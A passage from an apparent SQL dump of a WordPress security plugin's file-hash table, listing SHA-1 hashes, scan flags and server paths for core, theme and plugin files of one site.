cea4f47d434e58e187c970c4a879a123792a9c','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/wordfenceHash.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'81d9d4222521dfaab070fe4fc09522719c04b3bb','/home/westonspirit.org.uk/public_html/wp-admin/privacy-policy-guide.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'824ad2e95fe5e3265675687394f995b2f9d6afd6','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/models/common/wfGeoIP2.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'8295747bddd6ff252c942eae9dcda3ec0f30d3fe','/home/westonspirit.org.uk/public_html/wp-includes/class-wp.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'829a44194c57dc16061714a49767f57bcf6dd93a','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/redirection-version.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'82a4ba07baa355772ed58fa434a541dc1c26834d','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/logger/manager.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'82ae07cbb75893c278fa6550d93f8ba132641c15','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/options/option-select.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'8301eff9e8d3131f4b1445e06176efcdc3f2e99a','/home/westonspirit.org.uk/public_html/wp-admin/user/about.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'83366ccdae1d734186c30f0850d947a13fb8f0fd','/home/westonspirit.org.uk/public_html/wp-admin/includes/class-ftp-pure.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'83465b12f1e4b1f65a7b4ee61a8dcbd8a65f9750','/home/westonspirit.org.uk/public_html/wp-content/themes/twentytwenty/searchform.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'8346e8b4d26a7558a8ff4724934314c18fd1759f','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/widgets/spacer.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'83633682bc800e4a2286b3236ef706822e185bdf','/home/westonspirit.org.uk/public_html/wp-includes/SimplePie/Cache/File.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'8373584d9222cc87ca138b1b97520a99be49a006','/home/westonspirit.org.uk/public_html/wp-includes/link-template.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'8387120a8d3c8e5c37af5971a827d719bed4f66b','/home/westonspirit.org.uk/public_html/wp-includes/Requests/Utility/FilteredIterator.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'838d15484e5e2d528ea5bb9f72c1a21e76d657f9','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/Cached.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'83b268894fabe89f534ab6e25be9bb78508e99fe','/home/westonspirit.org.uk/public_html/wp-includes/SimplePie/Misc.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'83e3b3cbc63e2216ebc5c0509c74b019b0e22735','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/modules/safe-mode/mu-plugin/elementor-safe-mode.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'83e736d99556f9f5a6575be16acd4f4c9e5d424c','/home/westonspirit.org.uk/public_html/wp-includes/Requests/Exception/HTTP/409.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'8429fb9faa6312cfae119fcf7c0a3782c1a9a4ae','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Fe.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'843fa06f17b2c2328516dc1c3f8ac4b234f660ec','/home/westonspirit.org.uk/public_html/wp-mail.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'846912e4f318106843f2845ef99b604aaeb125fb','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/app/modules/kit-library/module.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'848b9ebc7a746c645d9aa084ea0c087470d90bef','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/app/modules/kit-library/data/taxonomies/controller.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'84912aa01bff90d42a296b7c38e38ddf12e2b206','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/ConnectionType.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'84bb3529248a93c234803785401ca85bdf3de9d2','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/database/schema/220.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'84efd66004b8fae70f5f86638bf92aae669f60fa','/home/westonspirit.org.uk/public_html/wp-admin/network/plugin-editor.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'851a2aa31c07daa1d8d2a12ddce2b4553f0749f0','/home/westonspirit.org.uk/public_html/wp-includes/rest-api/endpoints/class-wp-rest-application-passwords-controller.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'853899d9bca410286131d64d0b82f0da7daddb10','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/options/option-toggled-multiple.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'854b501b94c504fe03542e51d3fbc8791a61b3ad','/home/westonspirit.org.uk/public_html/wp-content/themes/newsmagbd/inc/theme_function.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'85a237feb048c98c39f250a6fac3c49cb9b59fa7','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/xmlrpc.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'85ad6587d0b0f1473f2ecfd47099f0b41443731a','/home/westonspirit.org.uk/public_html/wp-includes/ms-blogs.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'85c4156dd43bfc65460a674be338d134a0a0235c','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/api/api-404.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'85f889077dfb4e559e6535b067ced410b51462fc','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/HttpException.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'85f9c0e729adce5965742b76c7691bad0a716fe2','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/SipHash.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'8609c7a62d156be188d6db5233c0afa230dd359b','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/database/schema/233.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'861a181f4a3015c125992aa4a27ab0c6b46d38f5','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-image-editor-imagick.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'862ff68cd41ff278f29fcc530193145bb73cf729','/home/westonspirit.org.uk/public_html/wp-admin/includes/class-language-pack-upgrader-skin.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'8640a07c6c9d63ecb8620e5f971e90708a11e5e0','/home/westonspirit.org.uk/public_html/wp-admin/admin-functions.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'86531a8c2908dcef96cc2e0c335a479f6ff88d47','/home/westonspirit.org.uk/public_html/wp-admin/menu-header.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'86aa5af33ba91e2b1eacb6fa7dd0dfebfecf7d95','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/options/option-switch.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'86dd200c0a28b347bf80865dd54e6a90bff58189','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/modules/login-security/views/options/option-select.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'8739d4d66b1c3783a8e50e393ffbceef680b3996','/home/westonspirit.org.uk/public_html/wp-includes/SimplePie/Cache/Redis.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'87482f679bbae6029cc613bdde01daf97f013da6','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/wfOnboardingController.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'87650d5ec8ecd480f6bf61d8006a1114d797abfa','/home/westonspirit.org.uk/public_html/wp-includes/ID3/module.audio-video.flv.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'876f0a9b23f5d81a0c143eed7b2aa3e4d8d8716f','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/database/schema/232.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'877205461f461d137e32d7a37b8bfba4244f3a4f','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Poly1305/State.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'87935b82e0ca9c81dbe79a1e9d8a8c6f7924a8c6','/home/westonspirit.org.uk/public_html/wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-aside.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'87951d093ab7bd6ab4ac51752ccf491770594fdc','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/common/status-circular.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'87a034b5d1d77b248a38ac879adb2c7ef87e2c08','/home/westonspirit.org.uk/public_html/wp-includes/customize/class-wp-customize-filter-setting.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'87a44decf899cfc7c013aa58fb9408d218f744c1','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/scanner/scanner-status.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'87a574f4061b76daa989dd080486520446b4831a','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/src/Core/Base64/Common.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'87aea97f77dd86a778dfe021bcc7c6a32828e890','/home/westonspirit.org.uk/public_html/wp-includes/Requests/Exception/HTTP/428.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'87c3ad094f30a5725d8c2cd9136f84f7937a6ffc','/home/westonspirit.org.uk/public_html/wp-content/plugins/wp-cerber/cerber-pluggable.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'87ce1d80298d1357e9e16a765ad9df7cfcb99476','/home/westonspirit.org.uk/public_html/wp-admin/network/plugins.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'87d4c53fc3363cdfcdf280c1f2ae05dd4d018f2f','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-block-supports.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'8803784b64a1d697368368f269c3c352bf546e75','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/wfLog.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'8807e77d08af6681b88edc54469f90161aade642','/home/westonspirit.org.uk/public_html/wp-includes/Requests/Hooker.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'8820cf35290f41c0e74a8c7a74729c76bb78ef73','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/logger/items/php.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'883f444addbbd89b8b56a2f102cde6513a9615f7','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-locale.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'886c85dc5a6685c96e103c49043d9ca45766000e','/home/westonspirit.org.uk/public_html/wp-content/themes/newsmagbd/inc/template-tags.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'887bb4851a9bc4aba3af0df3885fb4014765aacd','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Fe.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'88d088b5f206676f5cc04de6ab1e7678fcd7324c','/home/westonspirit.org.uk/public_html/wp-admin/widgets.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'88f51e24eea6beb45baa936ff43b54118f86b415','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/waf/option-whitelist.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'89010ceddc25939092c68de723dc530c0b84f03d','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/options/block-controls.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'8901fabfa8cd2a2d4da32c62d055abb8d195f4dc','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/ProviderInterface.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'8912df652539906cab285f68b6fdd0cd4e1ea51f','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/modules/login-security/classes/controller/wordfencels.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'891e3abb642c53feb550ad9299856df89568a6b8','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/files/file-types/zip.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'89402aa1aefcd5a443beeb95a9d5482d3694f244','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'8944f1bc15b6eed56094459b5ed178ca070154f5','/home/westonspirit.org.uk/public_html/wp-admin/includes/class-theme-installer-skin.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'8946655eff17b1742635ae94ab427aca543da015','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/modules/system-info/helpers/model-helper.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'89476725cfe926dde8aaae22068232cb0b9bb48a','/home/westonspirit.org.uk/public_html/wp-admin/ms-upgrade-network.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'897e69b7024239b79a75cc68d0ce64e2f8227b60','/home/westonspirit.org.uk/public_html/wp-includes/user.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'898436df3d5a2db2b514a1091218949690849d06','/home/westonspirit.org.uk/public_html/wp-includes/widgets/class-wp-widget-media-audio.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'898cbd744af4888c2825a84ea3fc203cdfdc5777','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/src/Core32/Poly1305/State.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'89c0e60838811706ea6d8b6234a81e4267c45f32','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/files/assets/files-upload-handler.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'89d74d87cba8667583c9a74f244911c649a83921','/home/westonspirit.org.uk/public_html/wp-admin/includes/class-wp-filesystem-direct.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'89df0308dfbf2e14f512cd7f9056e88f33afe51d','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/error_polyfill.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'89dfd6e5c86ebe1ed45464879c7976ff8fcd1984','/home/westonspirit.org.uk/public_html/wp-admin/media-upload.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'89ed2d3bc4b0a67764bdc2f5bcab9ee0b6cf81a2','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/matches/custom-filter.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'89f4f21cbb66055638c26e09565187d1e108b3d7','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/scanner/issue-spamvertizeCheck.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'8a12de717eefa6a3ae90e1ede0ea9f7d6d927afd','/home/westonspirit.org.uk/public_html/wp-includes/random_compat/cast_to_int.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'8a1706e36bf87fdf384aa07d108ba0e8943015e8','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/modules/login-security/classes/model/compat.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'8a44191e32457c4bc2c590ef6992de9bfa48d58d','/home/westonspirit.org.uk/public_html/wp-content/themes/twentynineteen/inc/back-compat.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'8a54eed884ffcdea56f99dc65c2768e8cd5f64b3','/home/westonspirit.org.uk/public_html/wp-content/themes/twentynineteen/image.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'8a716ddacf0cea0cf3d0264ce746484939e555ef','/home/westonspirit.org.uk/public_html/wp-admin/network/theme-editor.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'8a8f004530c44f642a7d2990be753fbd87f58682','/home/westonspirit.org.uk/public_html/wp-admin/user/profile.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'8ac97d2abb6e0e70a706417b6053a1a76125d668','/home/westonspirit.org.uk/public_html/wp-admin/network/settings.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'8aeb58b461f1af40847561d1e21bc1c116ccc8b6','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/modules/login-security/views/options/option-textarea.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'8b1434301baacaaf948190591a0e0a7d53c0f22c','/home/westonspirit.org.uk/public_html/wp-admin/includes/class-wp-internal-pointers.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'8b145743bacc9f7b75785dc19e9c794921e2a7b8','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-walker.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'8b192a10bcb5d6956c7c1a79581b192772aaa5f2','/home/westonspirit.org.uk/public_html/wp-content/plugins/all-in-one-wp-security-and-firewall/classes/grade-system/wp-security-feature-item.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'8b1ec7987b9425f967d839ea7808c785d9701a40','/home/westonspirit.org.uk/public_html/wp-admin/includes/ms.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'8b823d0e84590c1010d4e4955ea1d13234033694','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/vendor/composer/autoload_real.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'8b8747ca663f86abdbc78ee827cd9ee4689478ac','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/waf/bootstrap.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'8bc6dc7f38ecffbc450baf8d5d10373d50ea6c9e','/home/westonspirit.org.uk/public_html/wp-admin/load-scripts.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'8bead1d2d1a7b0601b6b2182ce8999aa237eed91','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/src/Core32/ChaCha20.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'8bf48896e8072f4feb9660131d50727109988085','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/libraries/wp-background-process/wp-background-process.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'8c2c390671a715d24e92f3072cd9c7c2ab9a5d23','/home/westonspirit.org.uk/public_html/wp-includes/script-loader.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'8c6babcf8ca24eada53a3857f0304ec53a32212e','/home/westonspirit.org.uk/public_html/wp-admin/maint/repair.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'8c9687f2754044dc01373d15276c74dcf3a4139b','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/modules/system-info/reporters/base.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'8c9765a2b33bd9069ff18917c3b94c3aae64cb3a','/home/westonspirit.org.uk/public_html/wp-admin/network/site-info.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'8caf24fc1c662a544f69aa65043473026cbd6cc6','/home/westonspirit.org.uk/public_html/wp-content/themes/twentytwentyone/template-parts/post/author-bio.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'8ccaceb9d32669a0fa9e8afcb5d568d335478e0f','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/modules/wp-cli/update.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'8ce5b265c9f2dbe6dcc7212d8f9ef219bbad13b4','/home/westonspirit.org.uk/public_html/wp-admin/media.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'8d10bb7a24bafadd88aaa3614e5b76eee704267e','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-paused-extensions-storage.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'8d129cc3bbd75ce337bdac810b06d9b4db5b67b4','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/modules/login-security/classes/controller/cron.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'8d42cd1a197723535a06e5a56a80f4575bf3c9e7','/home/westonspirit.org.uk/public_html/wp-includes/embed.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'8d5556b4005653e7d0e9d71d2fdaf35099c4be0a','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/data/base/endpoint.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'8df439ac36e96ae0c41d0508b3a9e2669859fa6f','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/rest-api/wfRESTBaseController.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'8e3189025cf4e84cd294e219b3429e6f86d40d28','/home/westonspirit.org.uk/public_html/wp-includes/widgets/class-wp-widget-media-video.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'8e4fb8f2f27ca0d10e4664fe39c07255db01f1e6','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/controls/media.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'8e6071755b3291f24b330204bd6ab4417e5cb6db','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/modules/system-info/module.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'8e8eed77e62385553c0ad24d0a1be400094b5cbb','/home/westonspirit.org.uk/public_html/wp-content/themes/twentynineteen/inc/icon-functions.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'8eb87e1aff8e6dfc26dcba2fe6fa2cd19e8f4728','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/namespaced/Core/Salsa20.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'8ec4f659224ea53162f120bcae565e7538f23914','/home/westonspirit.org.uk/public_html/wp-admin/edit-tags.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'8ecb80a8cb1174bb0b036a84aea3f9dfc2f4a701','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Http/Request.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'8f0e05de77acd90d88f75a1286d8307961c9c312','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/schemes/base-ui.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'8f538b7492476b4aec8e71d33136b956e7860814','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/settings/editor-preferences/model.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'8f9f9b2a29779c3965f40ab254abfc90f8f92725','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_dev_urandom.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'8fc7e9ba303b8efdc888e900e09fb58b9efd06e6','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-feed-cache-transient.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'8ff0e5dc6e91c217ebf90cb0a8c0ade287aa137c','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/wfUtils.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'8ff99f5d0f6c08524502570be730bb28bc14a1f0','/home/westonspirit.org.uk/public_html/wp-content/plugins/all-in-one-wp-security-and-firewall/wp-security.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'9021b9514911e5fa3961b869645317cafb19bfa7','/home/westonspirit.org.uk/public_html/wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-installer.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'904cad0cc2c221d8d819057d9cb537002bda1b39','/home/westonspirit.org.uk/public_html/wp-includes/class-walker-page-dropdown.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'90a63a6ebd6e469dc17b504e1c73db92823cdc92','/home/westonspirit.org.uk/public_html/wp-includes/IXR/class-IXR-request.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'90ae2f96e7dc67e3f8e213dcc707f69d69e96fbc','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/base/sub-controls-stack.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'90b230536d6cc5c102322056a4a5a79c33e61574','/home/westonspirit.org.uk/public_html/wp-includes/customize/class-wp-customize-themes-panel.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'90c510841f9c5a30896950d26306a37822b9962a','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/src/Core32/Poly1305.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'90ec4539c02bc78fc491461ff6dec1833207b6b5','/home/westonspirit.org.uk/public_html/wp-includes/Requests/Exception/HTTP/404.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'90f2d4e1f329ffbac738b411378533bc620564b7','/home/westonspirit.org.uk/public_html/wp-includes/SimplePie/Cache/MySQL.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'90f984eb8782d88a0fa617e5e65d01ce55a0c0b5','/home/westonspirit.org.uk/public_html/wp-content/themes/newsmagbd/inc/customizer/core/customizer-core.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'911151b48c363926a0608d960cddf2e8471f07e6','/home/westonspirit.org.uk/public_html/wp-admin/user-edit.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'9129157e7b70bbc6ae0e61b736aab01501aa5740','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P2.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'912ad175bd82c03845878513c4e95494b7ee4d2d','/home/westonspirit.org.uk/public_html/wp-includes/block-supports/align.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'912edf2750075ba1dbf232e39f595813f60189cc','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/scanner/scan-starter.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'9142c286bd9378083b315cfb9078c8b7de5a1b36','/home/westonspirit.org.uk/public_html/wp-admin/ms-users.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'9182563326ae7860483118def2a6ba93c3e587cf','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/admin/admin-notices.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'91a0428f7a6469c9705fcffdc0aabdc11b7614db','/home/westonspirit.org.uk/public_html/wp-content/themes/twentytwenty/classes/class-twentytwenty-walker-page.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'91c41af49e9e932c875355fe232af0bbf0e7b4ec','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Precomp.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'91e0a099e59c8a9d2ee491f933fe7db2a4ebc4c7','/home/westonspirit.org.uk/public_html/wp-includes/rest-api/class-wp-rest-request.php',0,'','','',0,0,0,0,0,